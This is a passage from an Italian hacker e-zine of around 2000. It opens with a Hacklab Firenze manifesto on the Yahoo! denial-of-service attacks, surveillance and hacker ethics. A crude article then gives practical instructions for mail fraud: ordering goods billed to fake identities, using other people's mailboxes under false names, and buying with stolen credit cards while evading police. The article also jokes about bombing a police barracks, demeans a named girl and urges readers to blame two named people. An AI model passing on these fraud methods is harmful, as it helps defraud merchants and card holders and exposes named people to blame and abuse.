allindomani degli attacchi. In particolare ci porta a domandare quale senso abbia, ai fini della sicurezza reale, investire milioni di dollari in
strutture come il NIPC (National Infrastructure Protection Center, un organismo gestito da FBI ed altre agenzie per la sicurezza delle reti USA
contro i reati informatici) se poi a queste strutture non vengono trasmesse le informazioni che erano a disposizione dei più sofisticati centri di
sorveglianza USA.
Una seconda realtà da prendere in considerazione è questa: INTERNET
A DIFFERENZA DELLE RETI BLINDATE PER LA GESTIONE DELLE INFORMAZIONI STRATEGICHE DI NATURA ECONOMICA
POLITICA E MILITARE, È ALTAMENTE INSICURA, e gli alfieri della sicurezza in rete attraverso la repressione lo sanno benissimo, come
sanno benissimo che le misure proposte non servono in realtà a modificare questa situazione.
Secondo un rapporto FBI, nellanno trascorso, il 62% (sissignori, il sessantadue per cento) delle società americane ha subito violazioni degli
impianti informatici senza che nessuno gridasse alla minaccia epocale del terzo millennio. Del resto, i programmi usati per lattacco ad Yahoo! e
compagni si basano sugli stessi principi che milioni di ragazzini usano in tutto il mondo per fare ai loro coetanei il dispetto di mettergli KO la
macchina quando litigano in Internet Relay Chat. Lesistenza di questa possibilità di attacco e dei software utilizzati è nota da anni agli esperti di
sicurezza, e ponderose note tecniche su come prevenirle sono da anni disponibili su Internet. Questattacco ha quindi svelato a tutti che il re è
nudo, ma come nella favola tutti quanti in realtà lo sapevano benissimo da tempo. Allora, come mai questa fragilità?
La risposta è semplice: in primo luogo perché è fisiologicamente impossibile garantire sicurezza totale a una rete globale di comunicazione aperta
chesebbene tuttaltro che anarchicaè cresciuta in modo scarsamente pianificato e gerarchico, e che risente ancora dellimpostazione
originaria di rete militare, che doveva continuare a funzionare anche se gran parte di essa fosse stata distrutta da un attacco nucleare.
Ma anche e sopratutto per pure e semplici ragioni di profitto. Una cosa che gli isterici commentatori sugli attacchi si sono ben guardati dal far
rilevare è che, se i router (le macchine usate per far uscire le reti locali su Internet) fossero stati ben configurati secondo le norme di sicurezza,
lattacco sarebbe risultato inefficace. Ma una volta comprato un router e installato, le successive modifiche di configurazione devono essere
fatte da un esperto. E chiamare un esperto esterno o far addestrare un dipendente costa troppo caro.
Esistono poi in rete numerose macchine fisse che utilizzano tecnologie sofware come il Wingate (per sistemi Microsoft) che risultano penetrabili
con estrema facilità e da cui è possibile far partire attacchi come quelli contro Yahoo! etc. senza lasciare alcuna traccia. Macchine da cui
vengono però ricavati fior di profitti con il minimo di spesa.
La logica del commercio elettronico è una logica che taglia il più possibile sui costi fissi di macchine, spazi e personale per puntare tutto sul
profitto da pubblicità e sulla capitalizzazione finanziaria gonfiata. La "febbre delloro cibernetico", il miracolo della "nuova economia", mostrano
già i primi buchi e sotto i lustrini spunta la faccia delleconomia basata sulla logica di sempre: profitto attraverso lo sfruttamento pesante del
lavoro, e risparmio sulla sicurezza. Cosa succederà quando il nuovo soggetto collettivo, i lavoratori dellindustria rete, scemati gli entusiasmi e
linfatuazione giovanile per il monitorintelligentemente sfruttati da chi incentiva i miti dei tredicenni divenuti miliardari grazie a Internet e poi
paga un tozzo di pane chi lavora per luiprenderanno coscienza di questa situazione e agiranno di conseguenza?
Ma questo è un altro discorso, per ora limitiamoci a registrare come anche da questo punto di vista la "sicurezza in rete" richiederebbe interventi
ben diversi da quelli che Clinton e compagni si apprestano a farci trangugiare. Linasprimento delle pene detentive contro i reati telematici
(misura che tutti i governi stanno prendendo in esame, e che avrà per unico effetto concreto laffibbiamento di qualche anno di galera in più a
qualcuno abbastanza ingenuo da farsi pescare con le mani nel sacco e da diventare "monito per tutti") e linvestimento di milioni di dolari in
centri di sorveglianza giganteschi quanto inutili, sono misure di PURA FACCIATA. Non servono a migliorare la sicurezza ma a mantenere la
fiducia di massa nellInternet "nuova frontiera del profitto", per assicurarsi che i giganteschi flussi finanziari messi in moto da decine di milioni
di consumatori e di investitori scarsamente consapevoli di questa realtà non vengano meno.
Terza realtà: POCHI GIORNI PRIMA DEGLI ATTACCHI, E PRECISAMENTE IL 4 FEBBRAIO, LIETF (Internet Engineering Task Force,
lorganismo che lavora sugli standard e sui protocolli su cui si basa il funzionamento di Internet) AVEVA SECCAMENTE RIFIUTATO DI
PRENDERE IN CONSIDERAZIONE LA PROPOSTA DELLAMMINISTRAZIONE CLINTON DI APPORTARE MODIFICHE AI NUOVI
PROTOCOLLI IP CHE FACILITASSERO IL LAVORO DI INTERCETTAZIONE DELLE AGENZIE DI SORVEGLIANZA. Sebbene tale rifiuto in
realtà ostacoli in modo minimo dal punto di vista tecnico lintercettazione, dal punto di vista politico ha costituito una secca sconfitta, che è
andata ad aggiungersi a quelle già collezionate dai governi su questo terreno, e che rimarca ancora una volta come il "popolo della rete" non
abbia poi tanta fiducia nella paterna sorveglianza dello Stato. È anche legittimo dedurre che evidentemente per il team IETF (e del resto anche
per molte aziende) sorveglianza ed intercettazione non servono a garantire una briciola di sicurezza in più agli utenti Internet.
Malgrado questo, nei giorni immediatamente successivi allattacco, abbiamo sentito Clinton riproporre con forza un ennesimo robusto
finanziamento delle agenzie di sorveglianza USA (da 15 a 240 milioni di dollari destinati ad FBI ed NSA, a seconda di quanti gliene lasceranno
spendere i suoi avversari repubblicani) come illusoria panacea contro questi attacchi. Abbiamo sentito parlare di nuove futuristiche
cyberpolizie, mentre sappiamo che quelle esistenti sono già state in grado di prevedere gli attacchi, e che solo per scelta politica ed economica
questi allarmi non sono stati diffusi oltre il circuito bancario. Abbiamo visto lFBI offrire agli ingenui un proprio software per difendersi dagli
hacker (ma chi ci difenderà dallFBI?). Abbiamo visto persino la CIAquesto campione dellinsicurezza di massa e del terrorismo su scala
internazionaleergersi a baluardo della sicurezza in rete.
Intanto la Gran Bretagna (non a caso uno dei paesi beneficiari delle informazioni raccolte dal sistema dascolto clandestino Echelon) minaccia
due anni di galera a chi si rifiuterà di rendere accessibili allo Stato le chiavi private del proprio sistema crittografico che impedisce a terzi
indesiderati di leggere le proprie e-mail. In Cina gli utilizzatori di software di crittografia vengono schedati. In Russia sono in atto nuovi tentativi
di monitorare e limitare gli accessi alla rete.
In Germania abbiamo visto prima criminalizzare poi "collaborare con la polizia" (dizione ambigua che in questi casi può significare molte cose, da
un entusiastco sostegno al trovarsi in stato di semiarresto) lautore di un software che consente di effettuare attacchi come quelli contro Yahoo!
messo a punto per ragioni di analisi della sicurezza. Ancora una volta si cerca si sostenere il concetto pericolosissimo e nefasto della "security
by obscurity", per cui chi svela al grande pubblico le debolezze di un sistema che si vorrebbero tenere nascoste dovrebbe essere considerato
automaticamente responsabile degli attacchi portati contro questo sistema.
Proprio in questi ultimi giorni, Eric Holder (sempre lui, il geniale viceministro americano) ha informato il Congresso USA che, come contromisura
contro altri possibili attacchi di questo tipo, il governo sta apprestandosi ad inasprire ulteriormente le pene contro gli "hacker", a
responsabilizzare penalmente i genitori contro le marachelle al PC commesse dai loro frugoletti, a instaurare misure di monitoraggio sugli accessi
e i comportamenti su Internet, e dulcis in fondo, naturalmente, a criminalizzare gli anonymous remailer, quei servizi di anonimizzazione della
posta elettronica che rappresentano lunico modo a disposizione degli utenti con scarse conoscenze tecniche per garantirsi un anonimato reale
su Internet e per non far rintracciare a chiunque sia intenzionato a farlo lelenco dei propri corrispondenti.
Questi servizi, normalmente e storicamente disponibili su Internet, dopo il fallimento dei tentativi passati di additarli come un covo di pedofili e
terroristi, vengono ora presentati come una minacciosa "risorsa degli hacker", come se chiunque fosse dotato di un pò di competenze tecniche
non avesse in realtà a disposizione sistemi ben più efficaci per non farsi rintracciare, e come se non fosse assolutamente chiaro che con gli
attacchi portati contro Yahoo! etc. non hanno nulla a che vedere.
Infine, nel nostro paese, Rodotà in persona ha pensato bene di informarci su "Repubblica" che è lora di finirla con la "CyberAnrchia", che
rifiutare le regole e la paterna sorveglianza dello stato è infantilismo, e che un atteggiamento del genere è infantile, perché non solo mette a
rischio la libertà di tutti ma finisce per dare spazio alla "deregulation" che favorisce i poteri forti economicamente. Del resto tutti sanno che la
libertà può esistere solo attraverso le regole, e che queste regole non possono essere liberamente autoscelte ma devono essere necessariamente
imposte dallo stato per il bene di tutti. Particolarmente per il bene dei poveri e degli oppressi, per i quali lo stato rappresenta lunica difesa
contro i padroni e gi oppressori, particolarmente se lo stato in questione è a guida PDS...
A questo rispondiamo: NOSSIGNORI!
DEVE ESSERE CHIARO A TUTTI: NON È LA SICUREZZA, E TANTOMENO LA DIFESA
DEGLI INTERESSI DEGLI UTENTI CONTRO I POTERI FORTI CHE SI VUOLE INSEGUIRE CON MISURE DEL GENERE. Qui si vuole sfruttare il
panico per colpire quelle possibilità di sfuggire allocchio onnipresente del controllo statale, che Internet ha dato a milioni di persone che hanno
preso in contropiede stati e governi. Si profila un nuovo minaccioso attacco agli spazi di libertà individuale in rete attraverso misure che in realtà
con la prevenzione di questi attacchi non hanno NULLA a che fare, e nuovamente siamo chiamati a rispondere.
Ma va preso atto che rispetto a tutto questo, proprio la risposta della "comunità hacker" storica, dei "cyberpunk", di tutto il variopinto insieme
degli utilizzatori e dei navigatori "alternativi" di Internet è stata sinora debole ed ambigua. La reazione più comune è stata:
"un attacco del genere è roba da "lamer" (termine dispregiativo per indicare chi danneggia siti o pirateggia sofware avvalendosi di strumenti
tecnici messi a disposizione da altri senza avere la comprensione di quello che sta facendo e la padronanza tecnica che caratterizzebero il "vero
hacker") noi che centriamo?. Una reazione del genereconsiderando il fatto che in realtà non si sa tuttora NIENTE sugli autori e sui moventi di
chi ha compiuto lattacco, e che non è certo luso di un software piuttosto che di un altro a poter dare qualche indicazione sulleffettivo livello di
"lameraggine" degli autorici sembra più che altro estremamente ipocrita ed intenzionata ad eludere i veri nodi del problema per tenere bassa la
testa in un momento di crisi.
Ancor più esplicite in questo senso ci sembrano le reazioni di chi sta tentando di convincere i media che lhacker è fondamentalmente un
boy-scout che non danneggerebbe mai qualcosa, che si interessa solo di tecnica e che non domanda di meglio, una volta messa la testa a
partito, che farsi assumere da qualche software house o da qualche agenzia di sorveglianza o polizia. Azzerando completamente il fatto che se
davvero si intende agire in conformità al principio base de "linformazione vuole essere libera", allora spesso e volentieri ci si trova ad
infrangere qualche legge dello stato (e di ciò ci sono numerosi esempi storici) e che lavorare per polizie, agenzie di sorveglianza eccetera è in
totale contraddizione con questo principio.
In questo varco di confusione, di incertezza, e di equivoco spesso voluto, si sta inserendo lavversario, che mentre criminalizza i comportamenti
insubordinati cerca di enfatizzare a scopo di recupero politico ed economico (il talento dellhacker è una risorsa preziosa sotto entrambi gli
aspetti) lesistenza degli hacker "buoni". Buoni dal suo punto di vista, ovviamente: quelli che combattono la pedofilia in rete (magari al servizio
di parroci isterici ed ossessionati come Don Fortunato di Noto), quelli che sorvegliano i terroristi, quelli che danno assistenza alle agenzie di
polizia e se hanno commesso qualche "crimine" lo hanno fatto solo per leggerezza giovanile. Così assistiamo al fatto che Kevin
Mitnick,"cult-hero" della cultura underground su Internet, pluriprocessato e nemico pubblico numero uno USA per tanti anni, si trasforma di
colpo in una figura "buona" per i media quando si appresta a fornire collaborazione al governo USA per indagare su questi attacchi. Vediamo la
CIA fare appello agli hacker perchè ha bisogno di nuovi talenti e vediamo decine di migliaia di giovani rispondere allappello...
Questo non deve stupire più di tanto. La cultura hacker e cyberpunk non è sinora riuscita a sciogliere un nodo di fondo: lhacking è puro
possesso di capacità tecniche o è anche scelta e responsabilità personale etica e politica? e quale scelta?
Ma è proprio su questo interrogativo che da oggi si gioca la partita. Sinora è stato possibile alimentare lillusioneper chi voleva nascondere a
se stesso e agli altri questo problemache la diffusione di Internet, della "cultura di rete" senza altre specificazioni, delle capacità tecnologiche
"neutre", significasse automaticamente diffondere una nuova forma di libertà. Questa illusionecome quella dell"anarchia intrinseca" di
Internetè stata consentita dal convergere di due fattori: il carattere di per sè scarsamente gerarchico e difficilmente controllabile della rete, che
ha permesso linsorgere in essa di comportamenti e spazi insubordinati, e linteresse del capitale finanziario e commerciale a massificare Internet,
liberalizzando gli accessi e minimizzando i controlli in nome dello sviluppo del commercio elettronico.
Questa fase è vicina a chiudersi. Ha permesso lo sviluppo di una contraddizione notevole, perché Internet si è trovata ad essere insieme "nuova
frontiera" per la logica del profitto e mezzo di comunicazione di massa effettivamente "many to many", aperto a tutti e scarsamente governabile,
dove individui e piccoli gruppi possono tuttora concorrere con successo sul piano comunicativo con governi e grandi gruppi di potere
politico-economico in misura inimmaginabile per gli altri media, ma ora la situazione è mutata. Lulteriore espansione del commercio elettronico e
dei profitti non dipenderà più dalla liberalizzazione degli accessi e dalla scarsa sorveglianza, ma dipenderà dal recupero della capacità di
GOVERNARE la rete, o quanto meno dellillusione di essere in grado di farlo.
Rispondere a questo necessita di una nuova maturità. Non è più possibile oggi fingere che il trastullarsi con i nuovi giocattoli tecnologici e
cibernetici conduca da solo a risultati diversi dallinserirsi in un trend commerciale. Non è più possibile esorcizzare chi sottolinea
questambiguità di fondo e la necessità di rompere con la logica del profitto e del potere, con laccusa sprezzante di essere un barbogio
"veteroqualchecosista". Non è più possibile illudersi ed illudere che lo sbarco in forze dellindustria culturale e dello spettacolo su Internet (o lo
sbarco di essa in questa industria, ricordiamo che è stata America On Line a comprare la Warner Bros e non viceversa, alla faccia di chi ci
raccontava che la comunicazione su Internet era di per sè irriducibilmente antagonista agli altri media) rappresentino chissà quale progresso ed
elemento di innovazione se non di liberazione. E viceversa non è nemmeno più possibile fingere che la smania di protagonismo e presenzialismo
mediatico di tanti hacker, veri o presunti, alluda a qualcosa di sostanzialmente diverso dallo svendersi a questa industria e dallaccettare le
regole che la macchina mediatica globale per la produzione del consenso al pensiero unico ti impone per darti visibilità positiva.
Soprattutto, non è più possibile fingere che la passione e la capacità tecnologica, da sole o accompagnate tuttal più da qualche orpello di
irriverenza, da qualche comportamento e linguaggio "strani" che fanno tendenza, ma destituite di ogni altro senso e movente, possano condurre
alla fin fine a risultati diversi dal buon posticino alla software-house o allarruolamento nella CIA.
Per rispondere a questo scenario mutato occorre riflettere a fondo su cosa sia "hacking", senza eludere i problemi, senza accontentarsi di pararsi
le chiappe da chi vorrebbe ridurlo a criminalità, senza preoccupazioni di notorietà mediatica e di risultare graditi al giornalista o allo sbirro di
turno. Occorre maturare e portare avanti un NOSTRO concetto di hacking, senza lasciare che siano altri ad imporcelo. Occorre anche chiariree
sino in fondoche chi fa danni immotivati, chi si diverte a danneggiare altri, chi impiega tempo risorse e saperi solo per cavarsi il gusto di
rompere le palle a un pacifico user per affermare la propria presunta superiorità, o per danneggiare un sistema al solo scopo di esibirsi e godere
di uneffimera notorietà, non per questo è un hacker. Come non lo è chi craccka e pirateggia solo per cavarci dei soldi. Ma non lo è nemmeno chi
supinamente accetta le leggi e le norme che vorrebbero imporci in rete governi e multinazionali, chi fa propria la logica del profitto innanzitutto,
scegliendosi un lavoro legale invece del cracking, chi finisce per arruolarsi nella polizia o a fare il mercenario delle multinazionali. E non è un
caso che molti passino direttamente dal cieco vandalismo o allesibizionismo alla richiesta di arruolamento nella CIA.
Noi non crediamo di stare dicendo con questo nulla di diverso come hacklab di Firenze da quanto abbiamo detto sino dalla prima nostra uscita
pubblica. Né nulla di diverso da quanto siamo andati dicendo a titolo personale o in altre situazioni ancora prima di dar vita allhacklab. Perché
queste posizioni e questi ragionamenti non sono frutto unicamente delle nostre intelligenze personali, sono frutto dellintelligenza collettiva di
rete. E condividiamo quanto questa intelligenza collettiva ha proposto in merito, da anni e anni.
Noi quindi riaffermiamo che:
1) Intendiamo studiare e praticare il modo per garantirci in ogni caso la possibilità di comunicare e soddisfare i nostri bisogni e
desideri anche attraverso le nuove tecnologie. Rivendichiamo innanzitutto il diritto di diffondere e acquisire liberamente le
informazioni. In modo UNILATERALE se necessario, indipendentemente da leggi e normative. Ci assumiamo questa
responsabilità perché riconosciamo a noi stessi la capacità di autogestire scelte comportamenti e responsabilità etiche e politiche
in modo autonomo da quanto vorrebbero imporci stati, governi e maggioranze.
2) Intendiamo combattere la battaglia per mantenere Internet LIBERA il più possibile, che per noi significa anche il meno
possibile sottomessa alle esigenze di stati, governi, gruppi di potere economico ed agenzie di controllo e di spionaggio.
Intendiamo combattere questa battaglia anche sul piano legislativo e normativo, con intelligenza politica e scioltezza tattica,
senza rifiutare a priori lapporto di forze istituzionali, ma consapevoli innanzitutto che ciò che governi e capitali chiamano
"insicurezza" per noi è innanzitutto "libertà" e mettendo sempre al primo posto questo fatto.
3) Intendiamo studiare e praticare liberamente la possibilità di nuove forme di uso della tecnologia che abbiano in prospettiva lo
stesso senso di libertà e orizzontalità della comunicazione e dellinformazione che ha avuto Internet nei sui anni eroici, e
collaborare con chi a questo sta già lavorando, che a nostro giudizio merita lappellativo di "hacker" nella pienezza del suo senso
originario più di chiunque altro.
Sulla base di quanto detto finora riteniamo infine importantissimo aprire una discussione il più possibile allargata in rete sugli aspetti e le
responsabilità etiche e politiche nellhacking.
Proponiamo quindi che su questargomento venga aperto anche uno spazio fisico di discussione continuativa, aperta, orizzontale e non
formalizzata da comportamenti politichesi quali ordini del giorno, mozioni finali ecceterache non ci appartengono perché oscurano la libera
espressione e lassunzione di responsabilità personale.
Proponiamo che questo spazio resti aperto per tutta la durata dellhackmeeting 2000 e che i contributi di chiunque interverrà in esso siano
ridiffusi in rete e che possano essere liberamente riprodotti e distribuiti senza scopo di lucro.
Intendiamo naturalmente dare il necessario apporto, logistico e di dibattito, a tale spazio.
Hacklab Firenze - 6 Marzo 2000
http://firenze.linux.it/~leandro/hacklab
hacklab@firenze.linux.it
Della serie "Chi cerca trova!!!!!!" hihi
===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Illegality=--====ooO===0===Ooo===oOOo===ooO===0===Ooo===
LA TRUFFA POSTALE questa skonosciuta!!!
Autore: mR_bIs0n
Consumo: ho la brutta abitudine di iniziare gli art prima di mangiare... eheh
Abbigliamento: mutande (gialle davanti e marroni dietro) e kannottiera...
Musica ascoltata: un po'di tutto del momento... naturalmente in MP3!!!
Saluti a: Biby, Piccinni, Panino, Luigi, Faby e Simy (senn ki le sente...),
qualkun'altro ke non rikordo, il kanale #Phreak.it, tutti quelli di
AIS, XaRaBaS, gli operatori Telekom a kui ho rubato tanta roba...
Fankulo a: i prof. di merda, alla skuola bastarda, a tutti i Lamerini, a ki mi
sta sul kaxxo...
Dedicato a: tutte le belle gnokke ke ci sono in Italia, e a quella scema
dell'Ilaria ke prima di fidanzarsi kon qualkuno si fa le pere...
---
Beeeeeeeeeneeeeeeeee, kome va? Tutto bien? Vi state divertendo? Bravi...
Perk kazzo sto a dire ste kavolate???
.------------------------------------.
| Indice |
| 1)Intro |
| 2)Truffa da casa propria | <--- Mitiko!!!
| 3)Truffa da casa altrui |
| 5)Karta di kredito |
| 6)Riski |
| 7)Kazzate ke mi verranno in mente... |
ø-------------------------------------'
- Intro
Oggi vi illustrer varie teknike per la truffa via posta... ovvero il
mail - truffing!!! Si, proprio, kos... farsi arrivare a kasa roba senza
pagarla, ovviamente...
Non uso disclaimer, quindi se i carabinieri o kikkessi
vi arrestano per
quello ke avete fatto leggendo qui (per fare un esempio, mettiamo ke avete
letto kome fare a farsi un abbonamento ad una rivista, e voi vi fate una pera)
io sono il responsabile, il mio nome Fabio Fanizza, oppure se vi piace di +
Giuseppe Pasanisi, ditelo pure!!!
A parte gli skerzi a me non me ne pu fregare un kazzo, tanto la pula o i
carramba o quegli str***i della G.D.F. non sann nulla di me! AHAHAH (risata
sadika)...
- Truffa da casa propria
Oki, la truffa da casa propria consiste nel far arrivare della roba a casa
vostra... voi direte "ceeeeeerto! E la pago io!" NO! E'qui ke vi sbagliate,
infatti i metodi ke vi illustrer faranno in modo ke voi non centriate un
benamato kazzo...
Bene, mettiamo ke volete abbonarvi a Topolino... A TOPOLINO??? Ma ke kazzo
leggete? Evidentemente avete avuto problemi da pikkoli... dicevamo? Ah si!
Volete abbonarvi a Topolino, bene non dovete fare altro ke trovare una
kartolina d'abbonamento nelle riviste o nel Topolino stesso... ma attenzione!
La cartolina deve essere di quelle ke possono regalare l'abbonamento! EHHEHE!
Cio, una persona (es. Fabio Fanizza) vuole regalare un abbonamento a Topolino
(casualmente) a voi... bene questa kartolina lo permette! BENE!!! Quindi kol
fidato GenerID riempiamo la cartolina kon le generalit
del "donatore", mentre
nella sezione "donato" mettiamo i nostri datucci!!! Fatto? Bravi! Ora kome
modalit
di pagamento usiamo i bollettini, quanti pi possibili! Mirakkomando
usate un paesino sperduto magari nella Valle D'Aosta per la residenza del
"donatore"!!! Presto vi arriver
il vostro amato giornalino (ma Topolino se la
scopa mai Minnie???)!
Sikkome avete ordinato una kosa ke arriva ogni settimana, forse potrebbero,
quei bastardi della Walt Disney Italia, accorgersene ke i soldi non
arrivano... e potrebbero non inviare + un caxxo... bastardi...
Il bello di tutto sta ke voi non centrate davvero un caxxo! Infatti non avete
rikiesto voi l'abbonamento quindi siete puliti! Se poi qualkuno (ignoro ki) vi
akkusa di averlo rikiesto voi potrete sempre dire: "Kekazzvuoi?
(Questo opzionabile), Kiunkue avrebbe potuto fare l'abbonamento per farmi
uno skerzo! Fottiti (Idem)"...
Mettiamo ora ke ora avete visto una kosa ke vi serve ma nella kartolina non
c' la sezione del "donatore"... ke bastardi... vabb poko male... leggete +
avanti...
- Truffa da casa altrui
Bene, volete komprarvi qualkosa o farvi abbonamento a kualkos'altro... nulla
di + facile se per puro kaso avete qualke vostro amiko ke abita in un
kondominio... ehehheh sapete ke ci sono tantiiiissssiiimeee cassette di
posta... bene baster
usarne una libera e appicircarvici un nome a cazzo
(Es. Giuseppe Pasanisi)... fatto ci fate in modo ke la roba rikiesta sia
pagata tramite bollettini... eheheh il gioko fatto!!!
Skusate devo pisciare...
fatto!
Mi venuta fame (non mi sono nemmeno lavate le mani... hiihihih)
Lettore skoglionato : "Ma ke palle! Mo'in mezzo all'artikolo questo si mette a
a mangiare senza nemmeno lavarsi le mani..."
Vabbene!
Dicevamo per kaso ke un ragazzo non pu pi divertirsi dopo essere andato a
Teatro??? Ah no!
Oki, ma mettiamo ke kuello ke volete purtroppo kosta parekkio e bisogna
pagarlo o per contrassegno (soldi in contanti al corriere) o per karta di
kredito... leggete + avanti...
- Karta di kredito
Bene, bene... questo metodo mooolto teoriko, per il fatto ke per avere una
karta di kredito ce ne vuole... comunque per prokurarsela leggetevi l'art di
XaRaBaS su NewBies 5... oppure hackate visa.com kome mio cuggino...
bene una volta avuta questa benedetta karta non dovete fare altro ke trovare
una buona ubikazione per fare arrivare la roba... per esempio in un
kondominio... bene, ora fate l'ordine, ma attenzione utilizzate una generalit
fasulla... poi non mettete nessun numero telefoniko... se per ricevere la
roba c' bisogno di essere rikiamati, kiamate da kabina voi dicendo ke per
motivi di lavoro non avete il telefono a kasa... bene... dite anke ke per la
roba deve arrivare possibilmente verso un certo orario e giorno (a voi +
comodi), tanto kon la karta potete rikiedere kualsiasi metodo di spedizione!
IHIHIHIH!!! Pure kuello ke ti arriva entro 1 giorno... eheheh tanto mika
pagate voi! Una volta fatto tutto aspettate sotto nel kondominio il corriere
firmate e vi portate via la roba...
- Riski
Bene, dovete sapere ke per il metodo di truffa da casa, non ci sono problemi,
se proprio volete essere sikuri, kiamate l'ufficio abbonamenti della rivista
o giornale ke sia e fatevi spedire un fax dove dice ke voi non centrate un
kazzo kon la roba ke vi arriva regalata...
Per la truffa da casa altrui, invece, il diskorzo kambia... non usate sempre
la stessa ubikazione, state attenti a quei bast***i della G.D.F.... per
essere sikuri fate saltare in aria la loro kaserma del ka**o...
Per la karta di kredito state molto attenti... se fate un ordine da Internet
allora non basta usare un proxy... vedete un po'voi... se lo fate da
kartolina, da telefono (kabina ovviamente), fax (anonimo) o altro ke
assolutamente anonimo va bene... Non siate stupidi...
- Kazzate ke mi verranno in mente
Oki siamo arrivati alla fine dell'art... vi ringrazio tutti quanti i miei
ammiratori... alle ammiratrici (tre: una celebro-lesa, una kon gravi
malformazioni all'alluce del piede destro e una ke si krede McGyver e kon un
temperino e un rotolo di scotch mi costruisce un cellulare satellitare...)
(spero ke non ci siano lettori ke potrebbero offendersi per il fatto ke sono
celebro-lesi, o ke abbiano malformazioni all'alluce del piede destro o ke si
kredono McGyver... skusate)
Mo'ke vi diko +??? Kazzo sono le 3.15 e ci il corso di potenziamento di
matematika... seeeeee corso di rekupero!!!
Quindi vi saluto e vi lascio una favoletta ke non centra un kazzo kon tutto!
La volpe, il gatto e la iena
Un bel giorno una volpe e un gatto si contendevano un pezzo di karne
di allevamento proveniente da Cernobil... mentre bisticciavano una iena,
rapidamente, tolse il pezzo di karne e lo inghiott andandonese allegro
allegro! Morale della favola, tra i due litiganti il terzo muore intossikato.
CIAOOOOOOOOOOOOooooooooooooo.............
mR_bIs0n
############################################################################################
FinE rivista numero "1" DirtyNet
Ringraziamenti:
Giovanna - per il suo contributo al sapore di latino...
Norman^B^ - per lo studio del titolo, sollecitato da sYn
Ghent - Il flashmaster del futuro!
MinM - amicone di avatar.
CameloT - da un mese frequenta la rete ed è gia' un piccolo boss...
COsMo^ - sto' Fserve cia' rotto basta, ma la simpatia no.
mR.bIsOn - per la totale disponibilita'
kEwL - per la totale disponibilita' (forse un po' ripetitivo)
phaet - se non esisteva lo dovevano inventare!
NCKxxx - anche se piccolo e sempre vivo!
Aspettando in numero "2".....
---=La matematica non è un'opinione
---=Nulla si crea, nulla si distrugge, tutto si trasforma (Lavoisier)